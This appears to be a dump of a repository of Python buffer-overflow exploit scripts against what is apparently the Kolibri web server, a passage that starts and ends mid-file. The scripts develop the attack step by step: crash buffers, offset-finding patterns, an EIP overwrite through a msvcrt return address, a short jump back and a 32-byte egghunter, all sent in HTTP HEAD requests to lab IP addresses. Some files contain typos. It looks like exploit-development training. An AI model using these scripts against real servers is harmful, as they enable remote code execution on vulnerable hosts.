| #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "\xEB\xC4" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 192.168.201.140:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("192.168.201.140", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | hunter = ( 8 | "\x66\x81\xca\xff" 9 | "\x0f\x42\x52\x6a" 10 | "\x02\x58\xcd\x2e" 11 | "\x3c\x05\x5a\x74" 12 | "\xef\xb8\x62\x33" #b3 13 | "\x33\x66\x8b\xfa" #3f 14 | "\xaf\x75\xea\xaf" 15 | "\x75\xe7\xff\xe7" 16 | 17 | Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4" 18 | 19 | buffer = ( 20 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 21 | "Host: 192.168.201.140:8080\r\n" 22 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 23 | "Keep-Alive: 115\r\n" 24 | "Connection: keep-alive\r\n\r\n") 25 | 26 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | exp1.connect(("192.168.201.140", 8080)) 28 | exp1.send(buffer) 29 | exp1.close() 30 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | hunter = ( 8 | "\x66\x81\xca\xff" 9 | "\x0f\x42\x52\x6a" 10 | "\x02\x58\xcd\x2e" 11 | "\x3c\x05\x5a\x74" 12 | "\xef\xb8\x62\x33" #b3 13 | "\x33\x66\x8b\xfa" #3f 14 | "\xaf\x75\xea\xaf" 15 | "\x75\xe7\xff\xe7") 16 | 17 | Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4" 18 | Stage2 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 19 | 20 | buffer = ( 21 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 22 | "Host: 192.168.201.140:8080\r\n" 23 | "User-Agent: " + Stage2 + "\r\n" 24 | "Keep-Alive: 115\r\n" 25 | "Connection: keep-alive\r\n\r\n") 26 | 27 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | exp1.connect(("192.168.201.140", 8080)) 29 | exp1.send(buffer) 30 | exp1.close() 31 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*600 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_eip_b.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "B"*4 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_eip_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_eip_jmp_esp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*2 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_eip_jmp_esp_b33f_jmp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | #Egghunter 8 | #Size 32-bytes 9 | hunter = ( 10 | "\x66\x81\xca\xff" 11 | "\x0f\x42\x52\x6a" 12 | "\x02\x58\xcd\x2e" 13 | "\x3c\x05\x5a\x74" 14 | "\xef\xb8\x62\x33" #b3 15 | "\x33\x66\x8b\xfa" #3f 16 | "\xaf\x75\xea\xaf" 17 | "\x75\xe7\xff\xe7") 18 | 19 | #-------------------------------------------------------------------------------# 20 | # badchars: \x00\x0d\x0a\x3d\x20\x3f # 21 | #-------------------------------------------------------------------------------# 22 | # Stage1: # 23 | # (1) EIP: 0x77C35459 push esp # ret | msvcrt.dll # 24 | # (2) ESP: jump back 60 bytes in the buffer => \xEB\xC4 # 25 | # (3) Enough room for egghunter; marker "b33f" # 26 | #-------------------------------------------------------------------------------# 27 | 28 | Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4" 29 | 30 | 31 | buffer = ( 32 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 33 | "Host: 172.16.73.129:8080\r\n" 34 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 35 | "Keep-Alive: 115\r\n" 36 | "Connection: keep-alive\r\n\r\n") 37 | 38 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 39 | expl.connect(("172.16.73.129", 8080)) 40 | expl.send(buffer) 41 | expl.close() 42 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_eip_jmp_esp_jmp_2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "\xEB\xC4" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*600 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.130:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("172.16.73.129", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_crash_b.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "B"*4 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("172.16.73.129", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_crash_eip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("172.16.73.129", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_crash_eip_jmp_esp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*4 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("172.16.73.129", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_crash_jmp_back_60.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "\xEB\xC4" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("172.16.73.129", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_hunter_jmp_back_60.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | hunter = ( 8 | "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 9 | "\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 10 | ) 11 | 12 | Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4" 13 | 14 | buffer = ( 15 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 16 | "Host: 172.16.73.129:8080\r\n" 17 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 18 | "Keep-Alive: 115\r\n" 19 | "Connection: keep-alive\r\n\r\n") 20 | 21 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | exp1.connect(("172.16.73.129", 8080)) 23 | exp1.send(buffer) 24 | exp1.close() 25 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_hunter_stage2_pattcreate.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | hunter = ( 8 | "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 9 | "\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 10 | ) 11 | 12 | Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4" 13 | Stage2 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 14 | 15 | buffer = ( 16 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 17 | "Host: 172.16.73.129:8080\r\n" 18 | "User-Agent: " + Stage2 + "\r\n" 19 | "Keep-Alive: 115\r\n" 20 | "Connection: keep-alive\r\n\r\n") 21 | 22 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | exp1.connect(("172.16.73.129", 8080)) 24 | exp1.send(buffer) 25 | exp1.close() 26 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*600 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_crash_eip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_crash_eip_b.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "B"*4 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_eip_overwrite_jmp_esp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xc3\x77" + "B"*4 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_hunter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" 8 | "\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") 9 | 10 | Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xc3\x77" + "xEB\xC4" 11 | 12 | buffer = ( 13 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 14 | "Host: 172.16.73.129:8080\r\n" 15 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 16 | "Keep-Alive: 115\r\n" 17 | "Connection: keep-alive\r\n\r\n") 18 | 19 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 20 | expl.connect(("172.16.73.129", 8080)) 21 | expl.send(buffer) 22 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_jmp_back.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xc3\x77" + "xEB\xC4" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, 